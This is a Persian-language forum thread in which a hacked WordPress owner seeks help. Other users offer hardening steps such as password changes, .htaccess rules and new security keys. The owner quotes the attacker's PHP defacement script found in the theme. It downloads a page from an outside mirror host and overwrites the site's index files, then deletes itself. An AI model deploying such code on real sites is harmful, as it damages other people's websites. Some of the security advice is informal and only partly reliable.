سلام
من امروز به سایتم رفتم دیدم زد:
Hacked by
فقط دیفیس شده بود و منم فایل index.php ـه وردپرس رو از اول آپلود کردم و درست و یوزرنیم و پسورد هم درست(عوض) کردم.
پرمیشن این فایل رو هم کردم 444
من از هک و اینجور چیزا سر در نمیارم، آیا کسی هست که بتونه سایتم رو اسکن کنه و باگها رو شناسی کنه و بگه که چطوری برطرفشون کنم؟
اینم آدرس :
ممنون میشم کمک کنید
یعنی محتویات index.php رو تغییر داده بود دیگه؟
خود وردپرس که باگ شناخته شده نداره شاید قالبت باگ امنیتی داشته باشه که احتمالش کمه
کل وردپرس رو بجز فایلهای اپلود و... از اول آپلود کن احتمال داره جایی shell گذاشته باشه. وقتی یه فایل رو تونسته تغییر بده یا توسط shell اینکارو انجام داده یا پسورد نرم افزار مدیریت هاست(مثلا سی پنل) رو داشته که این خیلی خطرناکه مطمئنی پسورد رو لو ندادی؟
هاست از کجا گرفتی؟ Cpanel داری؟ اگر داری یه ویروس اسکن بزن
پرمیشن مگه نباید 644 باشه؟ چون بود بعد من فایل index.php رو 444 کردم
الان دوباره رفتم تو سایت دیدم زده:
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING in /home/ramtinak/public_html/wp-content/themes/ramtin-theme/index.php on line 2
اینبار انگار تم رو دستکاری کرده.
فایل index.php رو اینجوری کرده :
<?php
$def = file_get_contents(\'http://zonehmirrors.net/defaced/2013/01/13/baltstudio.lt/index.html\');
$p = explode(\'public_html\',dirname(__FILE__));
$p = $p[0].\'public_html\';
if ($handle = opendir($p)) {
$fp1 = @fopen($p.\'/index.html\',\'w \');
@fwrite($fp1, $def);
$fp1 = @fopen($p.\'/index.php\',\'w \');
@fwrite($fp1, $def);
$fp1 = @fopen($p.\'/index.htm\',\'w \');
@fwrite($fp1, $def);
echo \'Done\';
}
closedir($handle);
unlink(__FILE__);
?>
وقتی لینکی که توی این گذاشته رو باز کردم، انگار یکی دیگه ـست که دستکاری کرده!
دوباره این قسمت رو آپلود کردم، پرمیشن این هم کردم 444
راستی ظهر رمز و پسورد اکانتم توی سایت هم عوض شده بود که از دیتابیس تغییر دادم
اگه اشتباه نکنم توی وردپرس فقط میشه از دیتابیس یوزر لوگین رو عوض کرد
چطوری اینکار رو کرده؟
و اینکه دوباره عوض شده!
راستی همین الان هاست،ایمیل و.. هم اسکن کردم یکی پیدا شد:
هاست رو از آذرآنلاین گرفتم:
http://azaronline.com
فقط چندباری رمز هاست رو بهشون دادم چون چندتا مشکل داشت حلش کردن
اما هربار قبل از رمز دادن اول اون رو میزاشتم رمز اولیه و به اونها میدادم، وقتی کارشون تموم میشد هم رمزمو عوض میکردم.
هاست سی پنل این سایت هم جوریه که توی هاست فقط یک یوزر میشه ساخت.
یعنی میگی از اول وردپرس رو نصب کنم؟ اگه آره من بلد نیستم چطوری باید اطلاعات قبل رو برگردونم
درسته شل آپلود گرده اونی که انتی ویروست گرفته همون شله پاکش کن
پسورد سی پنل رو عوض کن/ پسورد دیتابیس رو عوض کن
همه پلاگینهای وردپرس رو موقتا غیر فعال کن
احتمال داره سایت تو مشکلی نداشته باشه
این هکرها میان با استفاده از باگی که یکی از سایتهای روی سرور هست از اون دسترسی میگیرن بعد از اونجا میان سایت تورو میزنن! البته این احتماله! شاید سایت خودت باگ داشته یا پسوردت رو لو دادی یا دزدیدن :D
کارهایی که گفتید رو انجام دادم
من کلا دوتا افزونه نصب کرده بودم
یکی Crayon syntex highliter بود اون یکی هم از قبل روی وردپرس بود(افزونه وردپرس فارسی)
و اینکه بعد از پاک کردن شل، این سنتکس هایلایتر هم توی لیست افزونه ها نبود منم رفتم تو هاست و به کل پاکش کردم.
من تم رو از یه سایت خارجی دانلود کرده بودم و تنها کاری که کردم ترجمه ی اون بود.
شایدم یه جاییش رو خراب کاری کردم!
فقط یه چیزی،چندروزی پهنای باند سایتم تموم شده بود، تا قبل از اینکه پهنای باند سایت تمومبشه این مشکلات نبود، بعد از اینکه تموم شد و من طرح سایتم رو بالاتر بردم
رمز وردپرس عوض شده بود و اینکه رمز هاست هم به حالت اولیه برگشته بود(رمزی که آذرآنلاین داده بود).(فکر کنم تغییر رمز هاست واسه این بوده که من تعرفه ی هاستم رو عوض کرده بودم، بوده)
در کل خیلی خیلی خیلی خیلی ممنون
سلام
یکسری کارهای عمومی برای جلوگیری از لو رفتن پسورده که باید انجام بدید مثلا همیشه از Onscreen keyboard استفاده کنید(بهتر اینه که نیمی از پسورد رو با کیبورد و نیمی رو با Onscreen keyboard تایپ کنید) و تا زمانی که تو کنترل پنلتون وارد شدید دیگه تو اون مرورگر هیچ سایتی رو باز نکنید.
این راه ها برای جلوگیری از لو رفتن پسورده اما منم فکر میکنم از سایتهای روی سرور خوردی.
پسورد دیتابیس تو فایل config ذخیره میشه که این فایل رو باید بصورت رمز دربیاری تا هکر نتونه براحتی پسورد دیتابیست رو پیدا کنه.
یکی از اشتباهاتی که انجام دادی این بود که پلاگین رو از یه سایت غیر از خود وردپرس دانلود کردی. خود وردپرس این امکان رو داره که از داخل داشبورد افزونه نصب کنی.
برای Protect کردن فایل کانفیگ(wp-config) میتونی از نرم افزار های Obfuscator استفاده کنی مثل این: http://www.phpprotect.info/downloads.php
بعلاوه حتما کنار فایل wp-config که تو روت هست یه فایل htaccess. درست کن و این محتویات رو توش بذار یا اگر وجود داره به آخرش اضافه کن:
<files wp-config.php>
order allow,deny
deny from all
</files>
برای اینکه ببینی درست انجام دادی بعد از مراحل بالا برو به این آدرس ببین باید پیام Access forbidden! بیاد.
http://youSite.ir/wp-config.php
این کد رو هم به اخر فایل wp-config.php اضافه کن:
define('DISALLOW_FILE_EDIT',true);
کلیدهای امنیتی رو که تو wp-config هستن عوض کن
میتونی از اینجا یه کلید تصادفی بگیری
مثلا:
define('AUTH_KEY', 'NW,VnbM-V|?Uq]`F3}h;7xE+k-x++8Q7@U)Et+^{n+b{Ry%N8IvU|y/43Mq0SZr4');
define('SECURE_AUTH_KEY', '.*_S%udC{R+wQtX)=/h2-i~VyEqlL-+;-Y.]jq:#Eq~+mhRi9ODuEk7%xUiy;)ld');
define('LOGGED_IN_KEY', 'vLt7ldlVbmx#j]Kez2lF(P&(T)v7MhnF3,Rv$R,,g=_c-3j6xx_GK<)+^JUwuIy)');
define('NONCE_KEY', 'qxYKP(Lwm3tQUm|2~+3X^6o,<y?J|lt-$5H|mp.;M6`)7LW$<-+j0aa)I=6qY*><');
define('AUTH_SALT', 'Qa[>~s8gtU^kdP_%O5+H>=|Z?iM++/UP_H2eBm4g%Uy909fWH DG$=rN!]WARu#h');
define('SECURE_AUTH_SALT', 'Z,qy$/[T+K9]t6<p1R?e|-Fp$I$xi|)(gCxi2aR^c>$a8A#C+ayfg><7?<vl?ly;');
define('LOGGED_IN_SALT', '`X2:RofW|#~,Bd5!V:e2dW`m1KdO&QkKj(@J5k;_jy%=J1ItK@;ti8mynJSk}gCG');
define('NONCE_SALT', 'fAs-A9I3-Jl{7n^x`i~$Pto|Oj-F1L!(8bVq~_v&fK9sfO~x`9$+!^8:vc|]$2m/');
من افزونه رو از تو خودِ وردپرس نصب کردم، تم رو از وردپرس نگرفته بودم
تمام کارهایی که گفتید رو انجام دادم. وقتی محافظت شد، این تکه کد توی فایل کانفیگ عوض شده بود:$table_prefix = 'wp_';
اینجوری:$Vky1tkljcash = 'wp_';
که دیگه میخواست یک راست وردپرس رو راه اندازه کنه که هی میزد Table ـه موردنظر وجود ندارد
که منم کردمش همون اولی.
راجع به htaccess هم نزد [color=#444444]Access forbidden! زد "صفحه ی مورد نظر پیدا نشد"[/color]
[color=#444444]اما قبل از اضافه کردن کد به htaccess وقتی به آدرس کانفیگ میرفتم یک صفحه ی سفیدی میاورد.[/color]
[color=#444444]الآن هیچ مشکلی وجود نداره[/color]
[color=#444444]ممنونم[/color]
این دیگه چه وضعشه!
این چرا همش یوزرنیم من عوض میشه؟!!!!!!
باز یوزرنیم وردپرسم عوض شده!
عجب بدبختی گیر افتادیما!
اگر نام کاربری عوض شده پس هکر به دیتابیس دسترسی داره. بعد از هک شدن نام و پسورد دیتابیس رو عوض کردی؟
احتمالش وجود داره که تو سیستمت کیلاگر نصب باشه انتی ویروست چیه؟ پسورد هارو با کیبورد مجازی تایپ کن
من از آنتی ویروس خود ویندوز 8.1 استفاده میکنم و حقیقتا دو هفته ای هستکه نه آپدیت کردم نه اسکن!
من چیزی تایپ نمیکنم، پسورد رو کپی پیست میکنم چون خیلی طولانیه
ها؟ :)
اسم اونو که نمیشه گذاشتن انتی ویروس! انتی ویروس نصب کن در ضمن هیچوقت پسورد رو کپی نکن چون اگر کیلاگر نصب باشه کارشو خیلی راحت تر میکنی.
یه پسورد 10-12 رقمی بذار اما پیچیده و یطوری که یادت بمونه.
چه آنتی ویروسی نصب کنم؟
چون من کلا از آنتی ویروس بدم میاد!
مخصوصــــــــــــــــــــــــــــــــــــــــــــــــــــا نود32! کلا اگه دسکتاپم بدون آنتی ویروس 15ثانیه طول میکشه که بیاد بالا با آنتی ویروس حدود 2دقیقه طول میکشه.
کلا سرعت نمیزاره واسه آدم:(
ندونستن عیب نیست، نپرسیدن چرا!
